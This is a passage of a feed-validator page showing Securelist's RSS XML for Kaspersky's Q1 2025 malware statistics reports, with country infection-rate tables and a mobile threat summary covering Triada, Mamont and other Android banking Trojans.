  2318. <td>9.10</td>
  2319. </tr>
  2320. <tr>
  2321. <td>11</td>
  2322. <td>Peru</td>
  2323. <td>8.78</td>
  2324. </tr>
  2325. <tr>
  2326. <td>12</td>
  2327. <td>Portugal</td>
  2328. <td>8.70</td>
  2329. </tr>
  2330. <tr>
  2331. <td>13</td>
  2332. <td>Nepal</td>
  2333. <td>8.38</td>
  2334. </tr>
  2335. <tr>
  2336. <td>14</td>
  2337. <td>Philippines</td>
  2338. <td>8.33</td>
  2339. </tr>
  2340. <tr>
  2341. <td>15</td>
  2342. <td>Romania</td>
  2343. <td>8.26</td>
  2344. </tr>
  2345. <tr>
  2346. <td>16</td>
  2347. <td>Sri Lanka</td>
  2348. <td>8.20</td>
  2349. </tr>
  2350. <tr>
  2351. <td>17</td>
  2352. <td>Bulgaria</td>
  2353. <td>8.19</td>
  2354. </tr>
  2355. <tr>
  2356. <td>18</td>
  2357. <td>Madagascar</td>
  2358. <td>8.14</td>
  2359. </tr>
  2360. <tr>
  2361. <td>19</td>
  2362. <td>Hungary</td>
  2363. <td>8.12</td>
  2364. </tr>
  2365. <tr>
  2366. <td>20</td>
  2367. <td>Egypt</td>
  2368. <td>8.12</td>
  2369. </tr>
  2370. </tbody>
  2371. </table>
  2372. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky product users.</em><br />
  2373. <em>** Unique users targeted by web-based <strong>Malware</strong> attacks as a percentage of all unique Kaspersky product users in the country/territory.</em></p>
  2374. <p>On average during the quarter, 6.46% of users&#8217; computers worldwide were subjected to at least one web-based <strong>Malware</strong> attack.</p>
  2375. <h2 id="local-threats">Local threats</h2>
  2376. <p>Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable media, or initially made their way onto the computer in non-transparent form. Examples of the latter are programs in complex installers and encrypted files.</p>
  2377. <p>Data in this section is based on analyzing statistics produced by anti-virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The statistics are based on detection verdicts from the OAS (on-access scan) and ODS (on-demand scan) modules of File Anti-Virus. The data includes detections of malicious programs located on user computers or removable media connected to the computers, such as flash drives, camera memory cards, phones, or external hard drives.</p>
  2378. <p>In the first quarter of 2025, our File Anti-Virus detected <strong>21,533,464</strong> malicious and potentially unwanted objects.</p>
  2379. <h3 id="countries-and-territories-where-users-faced-the-highest-risk-of-local-infection">Countries and territories where users faced the highest risk of local infection</h3>
  2380. <p>For each country and territory, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in various countries and territories across the globe.</p>
  2381. <p>The rankings only include attacks by malicious objects that belong in the <strong>Malware</strong> category. Our calculations do not include File Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware<em>.</em></p>
  2382. <table>
  2383. <tbody>
  2384. <tr>
  2385. <td></td>
  2386. <td><strong>Country/territory*</strong></td>
  2387. <td><strong>%**</strong></td>
  2388. <td></td>
  2389. </tr>
  2390. <tr>
  2391. <td>1</td>
  2392. <td>Turkmenistan</td>
  2393. <td>47.41</td>
  2394. </tr>
  2395. <tr>
  2396. <td>2</td>
  2397. <td>Tajikistan</td>
  2398. <td>37.23</td>
  2399. </tr>
  2400. <tr>
  2401. <td>3</td>
  2402. <td>Afghanistan</td>
  2403. <td>36.92</td>
  2404. </tr>
  2405. <tr>
  2406. <td>4</td>
  2407. <td>Yemen</td>
  2408. <td>35.80</td>
  2409. </tr>
  2410. <tr>
  2411. <td>5</td>
  2412. <td>Cuba</td>
  2413. <td>32.08</td>
  2414. </tr>
  2415. <tr>
  2416. <td>6</td>
  2417. <td>Uzbekistan</td>
  2418. <td>31.31</td>
  2419. </tr>
  2420. <tr>
  2421. <td>7</td>
  2422. <td>Gabon</td>
  2423. <td>27.55</td>
  2424. </tr>
  2425. <tr>
  2426. <td>8</td>
  2427. <td>Syria</td>
  2428. <td>26.50</td>
  2429. </tr>
  2430. <tr>
  2431. <td>9</td>
  2432. <td>Vietnam</td>
  2433. <td>25.88</td>
  2434. </tr>
  2435. <tr>
  2436. <td>10</td>
  2437. <td>Belarus</td>
  2438. <td>25.68</td>
  2439. </tr>
  2440. <tr>
  2441. <td>11</td>
  2442. <td>Algeria</td>
  2443. <td>25.02</td>
  2444. </tr>
  2445. <tr>
  2446. <td>12</td>
  2447. <td>Bangladesh</td>
  2448. <td>24.86</td>
  2449. </tr>
  2450. <tr>
  2451. <td>13</td>
  2452. <td>Iraq</td>
  2453. <td>24.77</td>
  2454. </tr>
  2455. <tr>
  2456. <td>14</td>
  2457. <td>Cameroon</td>
  2458. <td>24.28</td>
  2459. </tr>
  2460. <tr>
  2461. <td>15</td>
  2462. <td>Burundi</td>
  2463. <td>24.28</td>
  2464. </tr>
  2465. <tr>
  2466. <td>16</td>
  2467. <td>Tanzania</td>
  2468. <td>24.23</td>
  2469. </tr>
  2470. <tr>
  2471. <td>17</td>
  2472. <td>Niger</td>
  2473. <td>24.01</td>
  2474. </tr>
  2475. <tr>
  2476. <td>18</td>
  2477. <td>Madagascar</td>
  2478. <td>23.74</td>
  2479. </tr>
  2480. <tr>
  2481. <td>19</td>
  2482. <td>Kyrgyzstan</td>
  2483. <td>23.73</td>
  2484. </tr>
  2485. <tr>
  2486. <td>20</td>
  2487. <td>Nicaragua</td>
  2488. <td>23.72</td>
  2489. </tr>
  2490. </tbody>
  2491. </table>
  2492. <p><em>* Excluded are countries and territories with relatively few (under 10,000) Kaspersky product users.</em><br />
  2493. <em>** Unique users on whose computers local <strong>Malware</strong> threats were blocked, as a percentage of all unique users of Kaspersky products in the country/territory.</em></p>
  2494. <p>On average worldwide, local <strong>Malware</strong> threats were recorded on 13.62% of users&#8217; computers at least once during the quarter.</p>
  2495. ]]></content:encoded>
  2497. <wfw:commentRss>https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/feed/</wfw:commentRss>
  2498. <slash:comments>0</slash:comments>
  2501. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  2502. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  2503. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  2504. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2505. </item>
  2506. <item>
  2507. <title>IT threat evolution in Q1 2025. Mobile statistics</title>
  2508. <link>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/</link>
  2509. <comments>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/#respond</comments>
  2511. <dc:creator><![CDATA[Anton Kivva]]></dc:creator>
  2512. <pubDate>Thu, 05 Jun 2025 10:00:04 +0000</pubDate>
  2513. <category><![CDATA[Malware reports]]></category>
  2514. <category><![CDATA[Google Android]]></category>
  2515. <category><![CDATA[Mobile Malware]]></category>
  2516. <category><![CDATA[Malware Statistics]]></category>
  2517. <category><![CDATA[Malware Descriptions]]></category>
  2518. <category><![CDATA[Malware]]></category>
  2519. <category><![CDATA[Trojan Banker]]></category>
  2520. <category><![CDATA[Trojan]]></category>
  2521. <category><![CDATA[Trojan-Spy]]></category>
  2522. <category><![CDATA[Mamont]]></category>
  2523. <category><![CDATA[Triada]]></category>
  2524. <category><![CDATA[Mobile threats]]></category>
  2525. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116676</guid>
  2526.  
  2527. <description><![CDATA[The number of attacks on mobile devices involving malware, adware, or unwanted apps saw a significant increase in the first quarter.]]></description>
  2528. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><strong>IT threat evolution in Q1 2025. Mobile statistics</strong><br />
  2529. <a href="https://securelist.com/malware-report-q1-2025-pc-iot-statistics/116686/" target="_blank">IT threat evolution in Q1 2025. Non-mobile statistics</a></p>
  2530. <h2 id="quarterly-figures">Quarterly figures</h2>
  2531. <p>According to Kaspersky Security Network, in the first quarter of 2025:</p>
  2532. <ul>
  2533. <li>A total of 12 million attacks on mobile devices involving malware, adware, or unwanted apps were blocked.</li>
  2534. <li>Trojans, the most common mobile threat, accounted for 39.56% of total detected threats.</li>
  2535. <li>More than 180,000 malicious and potentially unwanted installation packages were detected, which included:
  2536. <ul>
  2537. <li>49,273 packages related to mobile bankers</li>
  2538. <li>1520 mobile ransomware Trojans.</li>
  2539. </ul>
  2540. </li>
  2541. </ul>
  2542. <h2 id="quarterly-highlights">Quarterly highlights</h2>
  2543. <p>Attacks on Android devices involving malware, adware, or potentially unwanted apps in the first quarter of 2025 increased to 12,184,351.</p>
  2544. <div class="js-infogram-embed" data-id="_/8P6yIGAQtZDpwXz3553s" data-type="interactive" data-title="01 EN-RU-ES Mobile malware Q1 2025 - charts" style="min-height:;"></div>
  2545. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Attacks on users of Kaspersky mobile solutions, Q3 2023 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180422/malware-report-mobile-statistics1.png" target="_blank" rel="noopener">download</a>)</em></p>
  2546. <p>This growth was largely due to the activity of Mamont banking Trojans and Fakemoney scam apps, along with the discovery of fake popular brand smartphones that came preloaded with the <a href="https://securelist.com/triada-trojan-modules-analysis/116380/" target="_blank" rel="noopener">Triada backdoor</a>, capable of dynamically downloading any modules from a server. Triada&#8217;s modules possess a variety of features. They can substitute URLs in the browser, block connections to specific servers, or steal login credentials for social media and instant messaging services like TikTok, WhatsApp, Line, or Telegram. A module that steals crypto from wallets is worth separate mention. We tracked down several of the scammers&#8217; wallets, the balances suggesting that a total of at least $270,000 had been stolen. The stolen amount in TRON cryptocurrency alone was $182,000.</p>
  2547. <div class="js-infogram-embed" data-id="_/MVFlNd9YeInPl0CKeVvj" data-type="interactive" data-title="02 EN Triada Trojan graphics" style="min-height:;"></div>
  2548. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>A profitability chart for the threat actor&#8217;s TRON wallets (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03132400/malware-report-mobile-statisticsEN2.png" target="_blank" rel="noopener">download</a>)</em></p>
  2549. <p>The first quarter saw the discovery of a new banker that attacks users in Turkey: Trojan-Banker.AndroidOS.Bankurt.c. It masquerades as an app for viewing pirated movies.</p>
  2550. <p align="center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png" class="magnificImage"><img loading="lazy" decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png" alt="" width="230" height="407" class="aligncenter size-full wp-image-116724" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1.png 496w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-169x300.png 169w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-198x350.png 198w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04183316/malware-report-mobile-statistics3-1-158x280.png 158w" sizes="auto, (max-width: 230px) 100vw, 230px" /></a></p>
  2551. <p>The Trojan uses DeviceAdmin permissions to gain a foothold in the system, obtains access to Accessibility features, and then helps its operators to control the device remotely via VNC and steal text messages.</p>
  2552. <h2 id="mobile-threat-statistics">Mobile threat statistics</h2>
  2553. <p>The number of detected Android malware and unwanted app samples increased compared to the fourth quarter of 2024, totaling 180,405.</p>
  2554. <div class="js-infogram-embed" data-id="_/dHrg8mbjTSEXXo0SjyKT" data-type="interactive" data-title="02-EN-RU-ES-Mobile malware Q1 2025 - charts" style="min-height:;"></div>
  2555. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Detected malicious and potentially unwanted installation packages, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180411/malware-report-mobile-statistics4.png" target="_blank" rel="noopener">download</a>)</em></p>
  2556. <p>Looking at the distribution of detected installation packages by type, we see that the typical frontrunners, RiskTool and adware, dropped to the third and fourth spots, respectively, in the first quarter. Banking Trojans (27.31%) and spy Trojans (24.49%) ranked as the most common threats.</p>
  2557. <div class="js-infogram-embed" data-id="_/JKZY7Rug0Ki5rKR0G7Vk" data-type="interactive" data-title="03-EN-Mobile report 2024" style="min-height:;"></div>
  2558. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of detected mobile apps by type, Q4 2024* – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03132852/malware-report-mobile-statisticsEN5.png" target="_blank" rel="noopener">download</a>)</em></p>
  2559. <p><em>* Data for the previous quarter may differ slightly from previously published data due to certain verdicts being retrospectively revised.</em></p>
  2560. <p>The revision was prompted by a sharp increase in Mamont banker installation packages in the first quarter. Agent.akg, which steals text messages, accounted for the largest number of spy Trojan installation packages.</p>
  2561. <div class="js-infogram-embed" data-id="_/98HERQOhQ4gCyyiwVIeM" data-type="interactive" data-title="04-ES-EN-Mobile report 2024" style="min-height:;"></div>
  2562. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Share* of users attacked by the given type of malicious or potentially unwanted apps out of all targeted users of Kaspersky mobile products, Q4 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/03133006/malware-report-mobile-statisticsEN6.png" target="_blank" rel="noopener">download</a>)</em></p>
  2563. <p><em>* The total may exceed 100% if the same users experienced multiple attack types.</em></p>
  2564. <p>The first quarter saw a sharp rise in the number of users attacked by Trojans. This was driven by a large number of detected devices preloaded with the Triada Trojan and the increased activity of Fakemoney scam apps, which tricked users into sharing their personal data by promising easy money. The increase in the number of users who encountered banking Trojans was, again, due to the activity of the Mamont family.</p>
  2565. <h2 id="top-20-most-frequently-detected-types-of-mobile-malware">TOP 20 most frequently detected types of mobile malware</h2>
  2566. <p><em>Note that the malware rankings below exclude riskware and potentially unwanted apps, such as adware and RiskTool.</em></p>
  2567. <table>
  2568. <tbody>
  2569. <tr>
  2570. <td><strong>Verdict</strong></td>
  2571. <td><strong>%* Q4 2024</strong></td>
  2572. <td><strong>%* Q1 2025</strong></td>
  2573. <td><strong>Difference in p.p.</strong></td>
  2574. <td><strong>Change in ranking</strong></td>
  2575. </tr>
  2576. <tr>
  2577. <td>Trojan.AndroidOS.Fakemoney.v</td>
  2578. <td>30.33</td>
  2579. <td>26.41</td>
  2580. <td>–3.92</td>
  2581. <td>0</td>
  2582. </tr>
  2583. <tr>
  2584. <td>DangerousObject.Multi.Generic.</td>
  2585. <td>13.26</td>
  2586. <td>19.30</td>
  2587. <td>+6.04</td>
  2588. <td>0</td>
  2589. </tr>
  2590. <tr>
  2591. <td>Trojan-Banker.AndroidOS.Mamont.db</td>
  2592. <td>0.08</td>
  2593. <td>15.99</td>
  2594. <td>+15.91</td>
  2595. <td></td>
  2596. </tr>
  2597. <tr>
  2598. <td>Trojan-Banker.AndroidOS.Mamont.da</td>
  2599. <td>1.56</td>
  2600. <td>11.21</td>
  2601. <td>+9.65</td>
  2602. <td>+14</td>
  2603. </tr>
  2604. <tr>
  2605. <td>Trojan-Banker.AndroidOS.Mamont.bc</td>
  2606. <td>10.79</td>
  2607. <td>7.61</td>
  2608. <td>–3.17</td>
  2609. <td>–2</td>
  2610. </tr>
  2611. <tr>
  2612. <td>Backdoor.AndroidOS.Triada.z</td>
  2613. <td>0.00</td>
  2614. <td>4.71</td>
  2615. <td>+4.71</td>
  2616. <td></td>
  2617. </tr>
  2618. <tr>
  2619. <td>Trojan.AndroidOS.Triada.hf</td>
  2620. <td>0.00</td>
  2621. <td>3.81</td>
  2622. <td>+3.81</td>
  2623. <td></td>
  2624. </tr>
  2625. <tr>
  2626. <td>Trojan.AndroidOS.Triada.fe</td>
  2627. <td>0.00</td>
  2628. <td>3.48</td>
  2629. <td>+3.47</td>
  2630. <td></td>
  2631. </tr>
  2632. <tr>
  2633. <td>Trojan.AndroidOS.Triada.gn</td>
  2634. <td>2.56</td>
  2635. <td>2.68</td>
  2636. <td>+0.13</td>
  2637. <td>+3</td>
  2638. </tr>
  2639. <tr>
  2640. <td>Trojan-Clicker.AndroidOS.Agent.bh</td>
  2641. <td>0.51</td>
  2642. <td>2.58</td>
  2643. <td>+2.07</td>
  2644. <td>+27</td>
  2645. </tr>
  2646. <tr>
  2647. <td>Trojan-Banker.AndroidOS.Mamont.ef</td>
  2648. <td>0.00</td>
  2649. <td>2.44</td>
  2650. <td>+2.44</td>
  2651. <td></td>
  2652. </tr>
  2653. <tr>
  2654. <td>Trojan-Downloader.AndroidOS.Dwphon.a</td>
  2655. <td>3.40</td>
  2656. <td>2.19</td>
  2657. <td>–1.21</td>
  2658. <td>–2</td>
  2659. </tr>
  2660. <tr>
  2661. <td>Trojan.AndroidOS.Fakemoney.u</td>
  2662. <td>0.02</td>
  2663. <td>1.88</td>
  2664. <td>+1.86</td>
  2665. <td></td>
  2666. </tr>
  2667. <tr>
  2668. <td>Trojan-Banker.AndroidOS.Agent.rj</td>
  2669. <td>3.63</td>
  2670. <td>1.86</td>
  2671. <td>–1.77</td>
  2672. <td>–7</td>
  2673. </tr>
  2674. <tr>
  2675. <td>Trojan-Banker.AndroidOS.Mamont.ek</td>
  2676. <td>0.00</td>
  2677. <td>1.83</td>
  2678. <td>+1.83</td>
  2679. <td></td>
  2680. </tr>
  2681. <tr>
  2682. <td>Trojan.AndroidOS.Triada.ga</td>
  2683. <td>4.84</td>
  2684. <td>1.74</td>
  2685. <td>–3.10</td>
  2686. <td>–11</td>
  2687. </tr>
  2688. <tr>
  2689. <td>Trojan-Banker.AndroidOS.Mamont.eb</td>
  2690. <td>0.00</td>
  2691. <td>1.59</td>
  2692. <td>+1.59</td>
  2693. <td></td>
  2694. </tr>
  2695. <tr>
  2696. <td>Trojan-Banker.AndroidOS.Mamont.cb</td>
  2697. <td>1.09</td>
  2698. <td>1.56</td>
  2699. <td>+0.47</td>
  2700. <td>+4</td>
  2701. </tr>
  2702. <tr>
  2703. <td>Trojan.AndroidOS.Triada.gs</td>
  2704. <td>3.63</td>
  2705. <td>1.47</td>
  2706. <td>–2.16</td>
  2707. <td>–13</td>
  2708. </tr>
  2709. <tr>
  2710. <td>Trojan-Banker.AndroidOS.Mamont.dn</td>
  2711. <td>0.00</td>
  2712. <td>1.46</td>
  2713. <td>+1.46</td>
  2714. <td></td>
  2715. </tr>
  2716. </tbody>
  2717. </table>
  2718. <p><em>* Unique users who encountered this malware as a percentage of all attacked users of Kaspersky mobile solutions.</em></p>
  2719. <p>Nearly the entire list was occupied by the aforementioned Fakemoney apps and various Mamont banking Trojan variants, along with preloaded Backdoor.AndroidOS.Triada.z, and Trojan.AndroidOS.Triada.hf malicious apps. Additionally, remaining among the most prevalent Android malware were modified messengers with the embedded Triada Trojan (Triada.fe, Triada.gn, Triada.ga, Triada.gs) and the preloaded Dwphon Trojan. What is interesting is the inclusion of the Trojan-Clicker.AndroidOS.Agent.bh sample on the list. This is a fake ad blocker that, conversely, inflates ad views.</p>
  2720. <h2 id="region-specific-malware">Region-specific malware</h2>
  2721. <p>This section describes malware families that mostly focused on specific countries.</p>
  2722. <table>
  2723. <tbody>
  2724. <tr>
  2725. <td><strong>Verdict</strong></td>
  2726. <td><strong>Country*</strong></td>
  2727. <td><strong>%**</strong></td>
  2728. </tr>
  2729. <tr>
  2730. <td>Trojan-Banker.AndroidOS.Coper.a</td>
  2731. <td>Turkey</td>
  2732. <td>96.85</td>
  2733. </tr>
  2734. <tr>
  2735. <td>Trojan-Banker.AndroidOS.Rewardsteal.ks</td>
  2736. <td>India</td>
  2737. <td>94.36</td>
  2738. </tr>
  2739. <tr>
  2740. <td>Trojan-Banker.AndroidOS.Coper.c</td>
  2741. <td>Turkey</td>
  2742. <td>94.29</td>
  2743. </tr>
  2744. <tr>
  2745. <td>Trojan-Banker.AndroidOS.Rewardsteal.jp</td>
  2746. <td>India</td>
  2747. <td>93.78</td>
  2748. </tr>
  2749. <tr>
  2750. <td>Trojan-Banker.AndroidOS.BrowBot.w</td>
  2751. <td>Turkey</td>
  2752. <td>92.81</td>
  2753. </tr>
  2754. <tr>
  2755. <td>Trojan-Banker.AndroidOS.Rewardsteal.ib</td>
  2756. <td>India</td>
  2757. <td>92.79</td>
  2758. </tr>
  2759. <tr>
  2760. <td>Trojan-Banker.AndroidOS.Rewardsteal.lv</td>
  2761. <td>India</td>
  2762. <td>92.34</td>
  2763. </tr>
  2764. <tr>
  2765. <td>Trojan-Spy.AndroidOS.SmForw.ko</td>
  2766. <td>India</td>
  2767. <td>90.71</td>
  2768. </tr>
  2769. <tr>
  2770. <td>Trojan-Banker.AndroidOS.UdangaSteal.k</td>
  2771. <td>India</td>
  2772. <td>90.12</td>
  2773. </tr>
  2774. <tr>
  2775. <td>Trojan-Dropper.AndroidOS.Hqwar.bf</td>
  2776. <td>Turkey</td>
  2777. <td>88.34</td>
  2778. </tr>
  2779. <tr>
  2780. <td>Trojan-Banker.AndroidOS.Agent.rg</td>
  2781. <td>India</td>
  2782. <td>86.97</td>
  2783. </tr>
  2784. <tr>
  2785. <td>Trojan-Dropper.AndroidOS.Agent.sm</td>
  2786. <td>Turkey</td>
  2787. <td>82.54</td>
  2788. </tr>
  2789. </tbody>
  2790. </table>
  2791. <p><em>* The country where the malware was most active.</em><br />
  2792. <em>** Unique users who encountered this Trojan variant in the indicated country as a percentage of all Kaspersky mobile security solution users attacked by the same variant.</em></p>
  2793. <p>The first quarter saw a somewhat smaller number of &#8220;selective&#8221; malicious apps than before. As usual, Turkey experienced a prevalence of banking Trojans: Coper, equipped with RAT capabilities enabling attackers to steal money through remote device management; BrowBot, which pilfers text messages; and the banking Trojan droppers Hqwar and Agent.sm. In India, users faced Rewardsteal banking Trojans which stole bank details by pretending to offer money. Additionally, the UdangaSteal Trojan, previously prevalent in Indonesia, and the SmForw.ko Trojan, which forwards incoming text messages to another number, also spread to India.</p>
  2794. <h2 id="mobile-banking-trojans">Mobile banking Trojans</h2>
  2795. <div class="js-infogram-embed" data-id="_/01neootOQ25aZkJQXhYk" data-type="interactive" data-title="05-EN-RU-ES-Mobile malware Q1 2025 - charts" style="min-height:;"></div>
  2796. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Number of installation packages for mobile banking Trojans detected by Kaspersky, Q1 2024 – Q1 2025 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04180435/malware-report-mobile-statistics7.png" target="_blank" rel="noopener">download</a>)</em></p>
  2797. <p>The increase in the number of installation packages for banking Trojans was primarily driven by Mamont. Its creators apparently follow a MaaS model, enabling any scammer to get a custom variant generated for a fee. As a result, a large number of unrelated cybercriminals are spreading distinct versions of Mamont.</p>
  2798. <p>When it comes to the percentage of users targeted, various versions of Mamont are also mainly at the top.</p>
  2799. <h3 id="top-10-mobile-bankers">Top 10 mobile bankers</h3>
  2800. <table>
  2801. <tbody>
  2802. <tr>
  2803. <td><strong>Verdict</strong></td>
  2804. <td><strong>%* Q4 2024</strong></td>
  2805. <td><strong>%* Q1 2025</strong></td>
  2806. <td><strong>Difference in p.p.</strong></td>
  2807. <td><strong>Change in ranking</strong></td>
  2808. </tr>
  2809. <tr>
  2810. <td>Trojan-Banker.AndroidOS.Mamont.db</td>
  2811. <td>0.41</td>
  2812. <td>38.07</td>
  2813. <td>+37.67</td>
  2814. <td>+18</td>
  2815. </tr>
  2816. <tr>
  2817. <td>Trojan-Banker.AndroidOS.Mamont.da</td>
  2818. <td>7.71</td>
  2819. <td>26.68</td>
  2820. <td>+18.98</td>
  2821. <td>+1</td>
  2822. </tr>
  2823. <tr>
  2824. <td>Trojan-Banker.AndroidOS.Mamont.bc</td>
  2825. <td>53.25</td>
  2826. <td>18.12</td>
  2827. <td>–35.13</td>
  2828. <td>–2</td>
  2829. </tr>
  2830. <tr>
  2831. <td>Trojan-Banker.AndroidOS.Mamont.ef</td>
  2832. <td>0.00</td>
  2833. <td>5.80</td>
  2834. <td>+5.80</td>
  2835. <td></td>
  2836. </tr>
  2837. <tr>
  2838. <td>Trojan-Banker.AndroidOS.Agent.rj</td>
  2839. <td>17.93</td>
  2840. <td>4.43</td>
  2841. <td>–13.50</td>
  2842. <td>–3</td>
  2843. </tr>
  2844. <tr>
  2845. <td>Trojan-Banker.AndroidOS.Mamont.ek</td>
  2846. <td>0.00</td>
  2847. <td>4.37</td>
  2848. <td>+4.37</td>
  2849. <td></td>
  2850. </tr>
  2851. <tr>
  2852. <td>Trojan-Banker.AndroidOS.Mamont.eb</td>
  2853. <td>0.00</td>
  2854. <td>3.80</td>
  2855. <td>+3.80</td>
  2856. <td></td>
  2857. </tr>
  2858. <tr>
  2859. <td>Trojan-Banker.AndroidOS.Mamont.cb</td>
  2860. <td>5.39</td>
  2861. <td>3.71</td>
  2862. <td>–1.67</td>
  2863. <td>–4</td>
  2864. </tr>
  2865. <tr>
  2866. <td>Trojan-Banker.AndroidOS.Mamont.dn</td>
  2867. <td>0.00</td>
  2868. <td>3.48</td>
  2869. <td>+3.48</td>
  2870. <td></td>
  2871. </tr>
  2872. <tr>
  2873. <td>Trojan-Banker.AndroidOS.Creduz.q</td>
  2874. <td>0.00</td>
  2875. <td>1.43</td>
  2876. <td>+1.43</td>
  2877. <td></td>
  2878. </tr>
  2879. </tbody>
  2880. </table>
  2881. ]]></content:encoded>
  2883. <wfw:commentRss>https://securelist.com/malware-report-q1-2025-mobile-statistics/116676/feed/</wfw:commentRss>
  2884. <slash:comments>0</slash:comments>
  2887. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  2888. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  2889. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  2890. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/04173235/SL-malware-report-q1-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2891. </item>
  2892. </channel>
  2893. </rss>
  2894.  

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/

Home · About · News · Docs · Terms

 
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda